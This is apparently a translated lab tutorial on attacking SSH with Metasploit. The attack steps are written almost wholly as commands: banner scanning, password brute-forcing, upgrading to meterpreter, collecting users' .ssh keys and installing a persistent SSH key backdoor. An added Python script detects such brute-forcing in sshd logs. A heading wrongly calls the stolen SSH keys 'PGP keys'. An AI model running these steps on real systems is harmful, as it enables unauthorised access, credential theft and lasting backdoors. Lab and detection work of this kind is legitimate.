Setting up a target machine and using msf for SSH penetration testing
Setting up the environment
Install openssh
sudo apt-get install openssh-server
Grabbing the SSH banner
nmap:
nmap -sV 192.168.222.147
Using msf's db_nmap:
msf > db_status
msf > db_nmap -sV 192.168.222.147
Using an msf auxiliary module to query the version number:
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.222.147
RHOSTS => 192.168.222.147
msf auxiliary(ssh_version) > exploit
Brute forcing
msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 192.168.222.147
RHOSTS => 192.168.222.147
msf auxiliary(ssh_login) > set USERPASS_FILE /root/Desktop/di.txt
USERPASS_FILE => /root/Desktop/di.txt
msf auxiliary(ssh_login) > exploit
msf auxiliary(ssh_login) > sessions 1
[*] Starting interaction with 1...
ifconfig
Run the following commands to obtain a meterpreter session:
sessions -u 2
sessions -l
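From the defender's side, the ssh_login run above shows up in the target's sshd log as a burst of failed passwords from one address followed by an accepted one. The following added example (not part of the original post) flags that pattern; the log lines, source addresses and host name are constructed, and the function name is hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample sshd lines in the usual /var/log/auth.log format
# (not from the original post; addresses and host name are made up).
SAMPLE_LOG = """\
Mar  3 10:15:01 target sshd[2101]: Failed password for root from 192.168.222.130 port 40112 ssh2
Mar  3 10:15:02 target sshd[2103]: Failed password for invalid user admin from 192.168.222.130 port 40114 ssh2
Mar  3 10:15:03 target sshd[2105]: Failed password for root from 192.168.222.130 port 40116 ssh2
Mar  3 10:15:04 target sshd[2107]: Failed password for invalid user test from 192.168.222.130 port 40118 ssh2
Mar  3 10:15:05 target sshd[2109]: Accepted password for root from 192.168.222.130 port 40120 ssh2
Mar  3 10:20:11 target sshd[2150]: Failed password for alice from 192.168.222.1 port 51000 ssh2
Mar  3 10:20:19 target sshd[2152]: Accepted password for alice from 192.168.222.1 port 51002 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def find_bruteforce(log_text, threshold=3):
    """Return one finding per source IP with >= threshold failed passwords.
    'compromised' names the account if a password was later accepted from that IP."""
    failures = defaultdict(list)   # ip -> usernames tried, in log order
    findings = {}
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip].append(user)
            if len(failures[ip]) >= threshold:
                findings.setdefault(ip, {"compromised": None})
                findings[ip]["failures"] = len(failures[ip])
                findings[ip]["users_tried"] = sorted(set(failures[ip]))
        elif ip in findings and findings[ip]["compromised"] is None:
            # Accepted login from an address already flagged for guessing
            findings[ip]["compromised"] = user
    return findings

if __name__ == "__main__":
    for ip, finding in find_bruteforce(SAMPLE_LOG).items():
        print(ip, finding)
```

A single mistyped password followed by a successful login, like the second address in the sample, stays below the threshold and is not reported.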
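Stealing PGP keys to log in over SSH
Collect the contents of the .ssh directory of every user on the target machine, and download known_hosts, authorized_keys and other files: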
msf post(sshkey_persistence) > use post/multi/gather/ssh_creds
msf post(ssh_creds) > set sessions 2
sessions => 2
msf post(ssh_creds) > exploit
Creating a persistent backdoor
Add an SSH key to a specified user so that remote login over SSH is possible
msf post(ssh_creds) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set sessions 2
sessions => 2
msf post(sshkey_persistence) > exploit